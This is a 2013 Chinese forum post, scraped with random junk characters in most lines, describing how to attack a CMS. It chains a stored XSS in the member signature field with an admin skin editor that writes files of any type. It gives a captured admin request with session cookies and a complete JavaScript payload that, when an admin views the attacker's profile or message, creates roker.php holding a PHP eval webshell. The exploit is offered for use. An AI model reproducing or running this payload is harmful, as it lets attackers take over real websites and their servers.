|
|
这个cms 以前 90有人发了个getshell,当时 是后台验证文件的问题# B7 P" L4 z N* `" Z! {9 D
官网已经修补了,所以重新下了源码/ ~8 P) \7 m" i% |4 B9 q
因为 后台登入 还需要认证码 所以 注入就没看了。
% K: ~3 J/ \6 H存在 xss
7 s! Z Y; Y$ |: ?% I7 [( l) q漏洞文件 user/member/skin_edit.php
/ k# z7 ] q( t% p! B# s本帖隐藏的内容<tr><td style="height:130px;"><span class="t"><i>*</i>签名:
& C# A. a4 b: X4 B( n5 N, V V5 \( a9 U- S
</span><textarea style="width:435px;height:120px;" id="content" name="CS_Qianm"><?php echo $cscms_qianm?>$ C& O- v7 p. E9 ]+ ^1 g Z
/ V, q! Q: R4 Z5 t! g
</textarea></td></tr>: D1 ^- M' V) _3 k$ ^* w; c' }
% ?+ j3 e/ Y* G user/do.php # c+ t- r. `& ~
D7 ]5 P% @2 A+ d( B- E
! s( U4 P8 @4 P/ i3 \4 ^
if($op=='zl'){ //资料
/ z% w2 e2 ?* T& K
; E" p7 I6 m( M: v if(empty($CS_QQ)||empty($CS_Nichen)||empty($CS_City)||empty($CS_Email)) # g0 n7 N; g8 P+ e9 w
exit(Msg_Error('抱歉,请把资料填写完整!','javascript:history.go(-1);'));
* X7 J8 \. m, ~
; V3 t0 U# s# a3 l9 R4 k( y( r $sql="update ".Getdbname('user')." set CS_Nichen='".$CS_Nichen."',CS_Email='".$CS_Email."',/ B7 \ y6 t5 `/ N2 J
- c% N, p5 x0 M5 P" s- U" ~( A. g
CS_Sex=".$CS_Sex.",CS_City='".$CS_City."',CS_QQ='".$CS_QQ."',CS_Qianm='".$CS_Qianm."'
8 m6 O! @( h% @8 y8 D. B+ { where CS_Name='".$cscms_name."'";2 y' O5 Q6 U- a" v* X. L
) \ p8 W5 d/ _0 P# L
if($db->query($sql)){
" B$ Y; v- j2 m5 i, Y* h4 p# z8 z & |# q. |/ u7 z/ \7 z' h0 Q. m
exit(Msg_Error('恭喜您,修改成功了!','javascript:history.go(-1);'));
# G# f1 A, P. h$ Y1 f 3 s1 L+ Z8 I, z0 q8 Z& K
}else{
3 {7 f* j9 P, l1 z , h- X1 Q6 t1 @+ j+ l( o% u+ v
exit(Msg_Error('抱歉,修改失败了!','javascript:history.go(-1);'));* Z2 U6 [8 P9 k U; D6 _
1 U8 t. |6 j& M0 i* q: |5 f }
0 Y6 B/ Q3 `/ {; N1 ] \
9 R g2 m7 g. P5 w
8 M W) c! i1 n9 A没有 过滤导致xss产生。 g, k R6 _, W( T5 G$ }0 `) _$ b
后台 看了下 很奇葩的是可以写任意格式文件。。
* A* F) u- x7 @; D( F/ Y( r2 L抓包。。
* I2 H. A/ l" H& u1 t
, F( |: I) k! d% m; C( B0 U, G2 E% t/ k4 x
本帖隐藏的内容POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.1, ^! o+ K9 V8 i! C. u6 J9 e( v
" W7 y/ O( O# Z2 d
Accept: text/html, application/xhtml+xml, */*
! y5 B, M6 f1 e2 l' f0 N
' k/ m) m- l% X1 t G8 s" sReferer: http://127.0.0.1/admin/skins/ski ... l/&name=aaa.php
* y% Q1 K$ N4 E8 W3 l ( w" M4 K! Z' c5 @# f1 N& U
Accept-Language: zh-CN
' j4 o h; p& p0 U& H/ k! W5 ?5 l/ {
. ^7 a/ [, S1 m7 g! b' K0 {! Y* xUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)6 A& q* M8 l6 p' M5 _
7 z1 p7 y+ a# ~8 h; o5 ~) nContent-Type: application/x-www-form-urlencoded2 Y) g. k7 t0 v% x( C# ?9 q9 S
8 t4 X1 F5 m( ~/ \! U
Accept-Encoding: gzip, deflate
2 \3 x+ F/ |& B0 d ! t2 u9 B, c. Q" Z |
Host: 127.0.0.1
K6 Y0 O5 `& @2 o6 z% @, B ( [3 J3 |+ n" Z, V/ o H/ n
Content-Length: 38
. R# C5 D! [1 L" l 3 m8 A& N% ^, `
DNT: 1
9 ]4 [, b! m. p 7 F. o% s4 s5 q" c" B4 r
Connection: Keep-Alive% C: p0 ?9 ]. z2 [: `5 T
0 X1 v8 J" R( }Cache-Control: no-cache
z4 f, m- h% d' L+ \5 s
( N( W' z& L1 {2 i5 F; XCookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b; CS_AdminUP=1; cs_id=2; cs_name=test; PHPSESSID=36db4a484bdbd090ad9846e3b7f65594$ u/ @- @- _" _2 l6 t" R( u
. _7 P9 L1 A1 \* b
3 ?; j7 M* L8 l6 D7 C
name=aaa.php&content=%3Cs%3E%3Ca%25%3E
3 t2 D r$ \! l
" g8 [3 C! o2 n' P2 L. }" I( h. _* M4 Y9 H( X
. v! i: C, m7 o/ h0 L& _
于是 构造js如下。
& V! |0 }; n* j3 h7 s, [: ]- ^) ^4 X+ ^
本帖隐藏的内容<script>
! r# B+ @: I7 M2 N4 d& t# zthisTHost = top.location.hostname;
' ?- \$ W1 P- r5 F( a. A
: Q) ^9 d, W+ j. |3 j0 nthisTHost = "http://" + thisTHost + "/admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/";; X9 J& H I. ~% i9 C# ]
1 w2 f- ?* E' a! ^function PostSubmit(url, data, msg) { " N# [9 H }: w0 S+ D8 f' C, a {
var postUrl = url;5 X2 u5 \+ Q, d0 b
- T& V' \, P( N* ~4 Q/ f) z var postData = data;
! B& {% F' _+ q) ?0 @9 S, x9 K var msgData = msg; 5 Q4 w$ ?* `5 Y2 j
var ExportForm = document.createElement("FORM"); % R4 @& _$ }/ U6 X3 u2 F
document.body.appendChild(ExportForm); 3 v7 L2 a7 m; z. Y! g& X
ExportForm.method = "POST"; : l4 T1 G' ?2 l T9 ?+ {+ S
var newElement = document.createElement("input"); ) \/ L$ M) n ?0 _ q* N
newElement.setAttribute("name", "name"); # \% f( A# t, @; V6 l2 u# `. f
newElement.setAttribute("type", "hidden");
$ }0 ]5 A9 P4 U/ W+ Q" Y var newElement2 = document.createElement("input"); " b$ P# Q. f2 _% A
newElement2.setAttribute("name", "content"); $ t4 W2 C E( o
newElement2.setAttribute("type", "hidden");
) H" X4 Y( [7 L4 l' n, T ExportForm.appendChild(newElement); 1 z) M8 O- g, @6 D/ q$ A# J4 I8 f) r
ExportForm.appendChild(newElement2);
; [* ?, M9 @: D- N: N: K0 ^ newElement.value = postData; , K9 L$ x; z: V: k( O
newElement2.value = msgData;
8 N; P! P, q" Q6 b; x! J# I7 O ExportForm.action = postUrl; & G" l( G* h# S2 \" c
ExportForm.submit();
) c2 r' Y* \0 f" ?5 Q3 M$ a" m};
9 \+ W$ M7 }+ I3 a% o: l+ G3 j
2 f: Y6 \" B1 d# i- _- tPostSubmit(thisTHost,"roker.php","<?php @eval($_POST[123]);?>");" W1 z0 O b+ o3 d
& o7 k! v! O' Z) I4 x</script>5 U5 `- M5 H5 p A
2 }" q7 }0 o9 X* F; n* {6 o+ u8 a9 T! R
M- ~8 W+ F1 l) Ohttp://127.0.0.1/user/space.php?ac=edit&op=zl 修改签名处 插入2 G) N( T1 M2 |+ {2 f [2 p
用你的账号给管理写个 私信 或者让他访问 你的主页http://127.0.0.1/home/?uid=2(uid自己改)
' }( Y" [2 g" t) A* ?就会 在 skins\index\html\目录下生成 roker.php 一句话。 |
% i2 B$ b. p% ?/ B
|
|
发表于 2013-11-6 18:09:37
收藏
支持
反对